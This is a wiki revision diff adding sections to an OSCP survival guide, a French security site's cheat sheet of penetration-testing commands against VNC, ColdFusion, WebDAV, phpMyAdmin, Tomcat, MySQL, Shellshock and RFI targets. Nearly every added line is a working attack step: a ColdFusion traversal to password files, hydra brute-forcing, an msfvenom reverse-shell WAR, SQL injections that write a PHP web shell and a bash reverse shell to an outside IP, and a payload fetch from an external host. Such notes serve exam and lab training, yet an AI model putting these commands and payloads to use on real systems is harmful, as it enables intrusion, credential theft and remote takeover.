Différences

Cette page vous donne les différences entre la révision choisie et la version actuelle de la page.

--- oscp_survival_guide [2020/11/25 14:16]
M0N5T3R
+++ oscp_survival_guide [2020/11/25 14:39] (Version actuelle)
M0N5T3R
@@ Ligne 2754: / Ligne 2754: @@
 https://raw.githubusercontent.com/xl7dev/Exploit/master/SquirrelMail/SquirrelMail_RCE_exploit.sh
+RealVNC
+RealVNC : https://www.exploit-db.com/exploits/36932
+Edit, BIND_ADDR into mine and BIND_PORT into 4444
+root@kali:~/PWK$python RealVNC-exploit-36932.py
+[] Please input an IP address to pwn: 10.11.1.227
+[] Hello From Server: RFB 003.008
+Ctrl+Alt+Shift+Del will be vmware’s ctrl+alt+del
+XAMPP
+XAMPP cred(wampp/xampp)
+ColdFusion (Vulnerable)
+Version check : http://example.com/CFIDE/adminapi/base.cfc?wsdl
+LFI(passowrd file) : http://server/CFIDE/administrator/enter.cfm?locale=…/…/…/…/…/…/…/…/…/…/ColdFusion8/lib/password.propertiesen
+(either – neo-security.xml and password.properties)
+ref : https://www.gnucitizen.org/blog/coldfusion-directory-traversal-faq-cve-2010-2861/
+exploit/windows/http/coldfusion_fckeditor – only for 8.0.1
+Webdav
+WebDav Vulnerability Check : nmap -T4 -p80 --script=http-iis-webdav-vuln 10.11.1.229
+auxiliary : webdav_test
+cadaver http://10.11.x.x/webdav/
+Uploading shells.txt to `shells.txt’
+dav:> put shells.txt
+dav:> copy shells.txt shells.asp;.txt
+PHPAdmin
+http://.../phpmyadmin
+db and password located @ /etc/phpmyadmin/config-db.php and default cred can be; (root/blank)(pma/blank)
+You can also bruteforce by sh hydra 10.10.10.43 -l admin -P /usr/share/dict/rockyou.txt http-post-form "/department/login.php:username=^USER^&password=^PASS^:Invalid Password!"
+Tomcat
+Default cred for Tomcat;“tomcat/tomcat” and check out /manager console by navigating to browsereg. http://10.11.1.209:8080/manager/html
+You can upload reverse shell on manager consor ; msfvenom jsp or war file
+msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.11.0.37 LPORT=443 -f war > shell.war
+jar -xvf shell.war
+Windows IIS
+Getting Windows 0S and version details through Nikto / Nmap Scanning.
+auxiliary/admin/http/iis_auth_bypass
+mysql
+nmap -sV -Pn -vv –script=mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 10.0.0.1 -p 3306
+MySQL login : sh mysql -h 192.168.88.152 -D wordpress -u root -p plbkac
+MySQL Spawning Reverse shell(linux) : union select ""<?php exec(\""/bin/bash -c \'bash -i >& /dev/tcp/159.203.242.172/1999 0>&1\'\"");"" INTO OUTFILE '/var/www/ecustomers/samshell4.php'
+UPLOAD A FILE :
+' union select ""<?php file_put_contents(\""root\"", file_get_contents(\""http://attack.samsclass.info/root\"")); ?>"" INTO OUTFILE '/var/www/ecustomers/samget2.php' #
+OPEN A PHP SHELL :
+' union select ""<?php system($_REQUEST['cmd']); ?>"" INTO OUTFILE
+ShellShock
+nikto scan results; shows shellshock on /cgi-bin; use 34900.py
+root@kali:~/Exam/Sicos1# python 34900.py payload=reverse rhost=192.168.88.155 lhost=192.168.88.157 lport=1234
+[!] Started reverse shell handler
+[-] Trying exploit on : /cgi-bin/status"
+Squid
+proxy scanner/http/squid_pivot_scanning
+RHOST : Target
+RANGE : Target
+RPORT : Squid port
+msf auxiliary(scanner/http/squid_pivot_scanning) > run
+[+] [192.168.88.155] 192.168.88.155 is alive but 21 is CLOSED
+[+] [192.168.88.155] 192.168.88.155:80 seems OPEN
+if the target uses squid proxy via 3128 port, use nikto with that proxy setting
+nikto -h 192.168.88.155 -useproxy http://192.168.88.155:3128"
+RFI(Remote File Inclusion)
+browse.php?file=http://10.11.0.42/index.html
+browse.php?file=ftp://10.11.0.42/index.html
+browse.php?expect://ls
+Uploading malicious .php file on database
+http://hackingandsecurity.blogspot.com/2017/08/proj-12-exploiting-php-vulnerabilities.html
 </code>

Zenk - Security

Outils d'utilisateurs

Outils du Site

Différences

Outils de la Page